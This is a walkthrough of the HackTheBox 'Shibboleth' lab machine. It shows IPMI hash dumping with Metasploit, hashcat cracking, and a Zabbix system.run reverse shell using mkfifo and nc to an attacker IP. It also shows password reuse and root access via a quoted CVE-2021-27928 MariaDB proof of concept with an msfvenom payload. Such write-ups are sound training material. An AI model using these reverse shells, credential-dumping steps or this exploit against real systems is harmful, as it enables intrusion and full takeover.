Shibboleth Writeup / Walkthrough Hack the box

TL;DR


This is a walkthrough writeup on Shibboleth which is a Linux box categorized as medium difficulty on HackTheBox.The initial foothold was gained by dumping the IPMI password hashes through the asf-rmcp service running on UDP port 623 & leveraging these credentials to get code execution through the Zabbix server dashboard. Lateral privesc was made possible through password reuse. Privilege escalation to root user was gained by exploiting an eval injection vulnerability in the MariabDB database version that was being used on the box.

Walkthrough

Shibboleth Writeup: Scanning Network

Scanning ports with Nmap :

Command : nmap -p 80 -sC -sV -A -n -Pn -oN nmap.initial 10.10.11.124
Nmap scan report for 10.10.11.124
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://shibboleth.htb/

We see an Apache Web Server running on TCP port 80

Scanning the UDP ports :

Command : nmap -sU --min-rate 1000 -n -Pn $IP
Nmap scan report for 10.10.11.124
Host is up (0.26s latency).
Not shown: 989 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
137/udp   closed netbios-ns
623/udp   open   asf-rmcp
1022/udp  closed exp2
1038/udp  closed mtqp
18485/udp closed unknown
19933/udp closed unknown
22053/udp closed unknown
22986/udp closed unknown
32815/udp closed unknown
49154/udp closed unknown
58797/udp closed unknown

We have UDP port 623 open, running a service asf-rmcp.

Website Enumeration

On browsing the IP address, we were being redirected to shibboleth.htb indicating that the server is using virtual host routing. Thus, let us add an appropriate entry in the /etc/hosts file :

10.10.11.124	shibboleth.htb

I saw that the “Contact Us form” was throwing an error (seemed probably because a certain required library was not installed):

Found nothing worth use on this website. Moving ahead with sub-directory enumeration.

Dirbuster Scan

/forms/

Readme.txt

This was just a Bootstrap information file :

contact.php

This had the same error message which we encountered earlier :

Sub-Domain Enumeration

We will be using the wfuzz tool, and also include the -H flag to add a Host header because the server is using virtual host routing :

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/Desktop/Boxes/HTB/Shibboleth]
โ””โ”€# wfuzz -H "Host: FUZZ.shibboleth.htb" --hl 9 -c -w /usr/share/wordlists/secLists/subdomains-top1million-5000.txt $IP
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.11.124/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                    
=====================================================================

000000099:   200        29 L     219 W      3684 Ch     "monitor"                                                                                                                  
000000346:   200        29 L     219 W      3684 Ch     "monitoring"                                                                                                               
000000390:   200        29 L     219 W      3684 Ch     "zabbix"                                                                                                                   

Total time: 0
Processed Requests: 4989
Filtered Requests: 4986
Requests/sec.: 0

We found 3 sub-domains, so let’s add them to the /etc/hosts file.

10.10.11.124	shibboleth.htb monitor.shibboleth.htb monitoring.shibboleth.htb zabbix.shibboleth.htb

Well, on browsing, all the three sub-domains lead to the same page –> Zabbix login page

What is Zabbix ?

Zabbix is an open-source monitoring software tool for diverse IT components, including networks, servers, virtual machines and cloud services. Zabbix provides monitoring metrics, among others network utilization, CPU load and disk space consumption.

I tried a bunch of default credentials here, but none of them worked.

I was kinda hitting a wall here, but wait, remember that UDP port we found? Let’s enumerate that ๐Ÿ™‚

Enumerating port 623 running asf-rmcp

What is asf-rmcp ?

ASF is a DMTF standard that provides a remote control and alerting interface between management consoles and ASF-aware hosts.
RMCP is a network protocol used by a management console to remotely control an ASF-aware host.

This makes sense, because the host is running Zabbix, which is a monitoring software tool.

Dumping IPMI hashes

On googling, I stumbled upon this blog 623/UDP/TCP – IPMI – HackTricks

It has a section talking about “dumping IPMI hashes” using a Metasploit module, going ahead with this :

msf6 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > options

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                  Current Setting                                            Required  Description
   ----                  ---------------                                            --------  -----------
   CRACK_COMMON          true                                                       yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                                              no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                                 no        Save captured password hashes in john the ripper format
   PASS_FILE             /usr/share/metasploit-framework/data/wordlists/ipmi_passw  yes       File containing common passwords for offline cracking, one per line
                         ords.txt
   RHOSTS                                                                           yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 623                                                        yes       The target port
   SESSION_MAX_ATTEMPTS  5                                                          yes       Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
   SESSION_RETRY_DELAY   5                                                          yes       Delay between session retries in seconds
   THREADS               1                                                          yes       The number of concurrent threads (max one per host)
   USER_FILE             /usr/share/metasploit-framework/data/wordlists/ipmi_users  yes       File containing usernames, one per line
                         .txt

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSTS 10.10.11.124
RHOSTS => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:4458aac582020000479fa54d6008d9318aaf7129bfdcd2cc4ad4221b7e41c0f40c59e380513da442a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:1af2e66206082e7b78a920cc983f862daab424ae
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We did obtain a password hash for the user Administrator :

Administrator:4458aac582020000479fa54d6008d9318aaf7129bfdcd2cc4ad4221b7e41c0f40c59e380513da442a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:1af2e66206082e7b78a920cc983f862daab424ae


Cracking the obtained hash using hashcat

We checked the manual page for hashcat and saw that mode 7300 --> IPMI2 RAKP HMAC-SHA1.

hashcat.exe -m 7300 -a 0 -o ./wordlists/cracked.txt ./wordlists/hash.txt ./wordlists/rockyou.txt
4458aac582020000479fa54d6008d9318aaf7129bfdcd2cc4ad4221b7e41c0f40c59e380513da442a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:1af2e66206082e7b78a920cc983f862daab424ae

ilovepumkinpie1

Shibboleth Writeup: Zabbix Dashboard (logging in with obtained creds)

user : Administrator
pass : ilovepumkinpie1
Zabbix Dashboard

Shibboleth Writeup: Shell as zabbix

Now, the next challenge to somehow get code execution through the access we got on Zabbix. On googling around, I found this old video by our teacher, Ippsec –> HackTheBox – Zipper – YouTube , in which he talks about how we can get authenticated code execution on Zabbix :

Going to the “Configuration –> Hosts” section, and choose the host on which you are concerned about, shibboleth.htb in our case :

Shibboleth Writeup

Going to the “Items” section, and on the top right goto “Create Item” :

What is item in Zabbix ?

Items are the ones that gather data from a host. Once you have configured a host, you need to add some monitoring items to start getting actual data.
Shibboleth Writeup

We will fill up the fields, including the “Key” field with the reverse shell command by choosing ‘system.run‘ option from the drop-down list.

more info on system.run

system.run key needs two arguments command and mode. We will give the reverse shell command as the first argument (command), and for mode parameter, we will use, nowait, because we want the reverse shell command to execute without wait.

Here is the complete command :

system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f,nowait]
Shibboleth Writeup

Hit the “Test” option and then, click on “Get Value” to run the command & obtain a reverse shell.

Shibboleth Writeup

Obtaining a reverse shell as user zabbix on our listening port :

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/Desktop/Boxes/HTB/Shibboleth]
โ””โ”€# nc -nvlp 1337
listening on [any] 1337 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.124] 32832
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=110(zabbix) gid=118(zabbix) groups=118(zabbix)
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"

[email protected]:/$ id
uid=110(zabbix) gid=118(zabbix) groups=118(zabbix)

Shibboleth Writeup: User Flag โ›ณ

Shell as ipmi-svc

We enumerated the file system and found out another user impi-svc. Using the password we found for Zabbix, we were able to switch to user ipmi-svc (password reuse) :

[email protected]:/var/www/html$ su ipmi-svc
Password: 
[email protected]:/var/www/html$

[email protected]:~$ cat user.txt 
540b1***************************

Privilege Escalation

On further enumerating the file system, I found a config file for the Zabbix server, which revealed the database credentials :

FILE : /etc/zabbix/zabbix_server.conf

[email protected]:~$ cat /etc/zabbix/zabbix_server.conf | grep -v \^\# | grep -v '^$'

LogFile=/var/log/zabbix/zabbix_server.log
LogFileSize=0
PidFile=/run/zabbix/zabbix_server.pid
SocketDir=/run/zabbix

DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluh

SNMPTrapperFile=/var/log/snmptrap/snmptrap.log
Timeout=4
AlertScriptsPath=/usr/lib/zabbix/alertscripts
ExternalScripts=/usr/lib/zabbix/externalscripts
FpingLocation=/usr/bin/fping
Fping6Location=/usr/bin/fping6
LogSlowQueries=3000
StatsAllowedIP=127.0.0.1
DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluh

I immediately tried to connect to the MySQL database using the above creds & found some password hashes for the users of Zabbix

[email protected]:~$ mysql -D zabbix -u zabbix -p
Enter password: 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 3876
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [zabbix]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| zabbix             |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [zabbix]> use zabbix;
Database changed

MariaDB [zabbix]> show tables;
+----------------------------+
| Tables_in_zabbix           |
+----------------------------+
    ********SNIP*******
| users                      |
    *******SNIP*********


MariaDB [zabbix]> select userid,alias,name,surname,passwd from users;
+--------+---------------+--------------+---------------+--------------------------------------------------------------+
| userid | alias         | name         | surname       | passwd                                                       |
+--------+---------------+--------------+---------------+--------------------------------------------------------------+
|      1 | Admin         | Zabbix       | Administrator | $2y$10$L9tjKByfruByB.BaTQJz/epcbDQta4uRM/KySxSZTwZkMGuKTPPT2 |
|      2 | guest         |              |               | $2y$10$89otZrRNmde97rIyzclecuk6LwKAsHN0BcvoOKGjbT.BwMBfm7G06 |
|      3 | Administrator | IPMI Service | Account       | $2y$10$FhkN5OCLQjs3d6C.KtQgdeCc485jKBWPW4igFVEgtIP3jneaN7GQe |
+--------+---------------+--------------+---------------+--------------------------------------------------------------+
3 rows in set (0.000 sec)

Although, we already had the password for the Admin user of Zabbix console but the database seemingly has 2 different Admin accounts and password hashes.

I tried to crack the hash for the Admin users but its a bcrypt hash, and was taking a hell lot of time. I did run hashcat for a while on it, but soon realized that this wasn’t the intended pathway for rooting this box.

After enumerating a lot, I was almost hitting a wall, but then I went on to check exploits for the services running on the box. And fortunately enough, I found something potentially exploitable.

Vulnerable DB version

The DB version is displayed to us when we log in to the database :

Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Searching for exploits for this version :

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/Desktop/Boxes/HTB/Shibboleth]
โ””โ”€# searchsploit mariadb 10
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
MariaDB 10.2 - 'wsrep_provider' OS Command Execution                                                                                                      | linux/local/49765.txt
MariaDB Client 10.1.26 - Denial of Service (PoC)                                                                                                          | linux/dos/45901.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

On googling around, I found that the MariaDB version 10.3.25 is vulnerable to CVE-2021-27928 :

MariaDB 10.2 Command Execution โ‰ˆ Packet Storm (packetstormsecurity.com)

Shibboleth Writeup
Exploit : An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying 'wsrep_provider' and 'wsrep_notify_cmd'.
Can read more about the vulnerability here. 
# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
# Date: 03/18/2021
# Exploit Author: Central InfoSec
# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
# Tested on: Linux
# CVE : CVE-2021-27928

# Proof of Concept:

# Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so

# Start a listener
nc -lvp <port>

# Copy the payload to the target machine (In this example, SCP/SSH is used)
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so

# Execute the payload
mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'

Following the exploit instructions –>

Exploit

Creating a reverse shell payload using msfvenom :

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/Desktop/Boxes/HTB/Shibboleth]
โ””โ”€# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=6969 -f elf-so -o reverse.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf-so file: 476 bytes
Saved as: reverse.so

Transferred it to the box by serving it on a Python server.

And setting the variable wsrep_provider with the value of the ‘path to the payload’, gives us a reverse shell as user root :

MariaDB [zabbix]> SET GLOBAL wsrep_provider="/home/ipmi-svc/reverse.so";
ERROR 2013 (HY000): Lost connection to MySQL server during query

MariaDB [zabbix]> 

Shibboleth Writeup: Root Flag โ›ณ

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[~/Desktop/Boxes/HTB/Shibboleth]
โ””โ”€# nc -nvlp 6969
listening on [any] 6969 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.124] 51714
id
uid=0(root) gid=0(root) groups=0(root)
pyhton3 -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 2: pyhton3: not found
python3 -c "import pty;pty.spawn('/bin/bash')"
[email protected]:/var/lib/mysql# id
id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/var/lib/mysql# cat /root/root.txt
cat /root/root.txt
7615e***************************

Kudos for rooting Shibboleth. Until next time, keep hacking and do checkout other writeups and blogs on sheerazali.com

Posts created 10

Leave a Reply

Your email address will not be published.

Related Posts

Begin typing your search term above and press enter to search. Press ESC to cancel.

Back To Top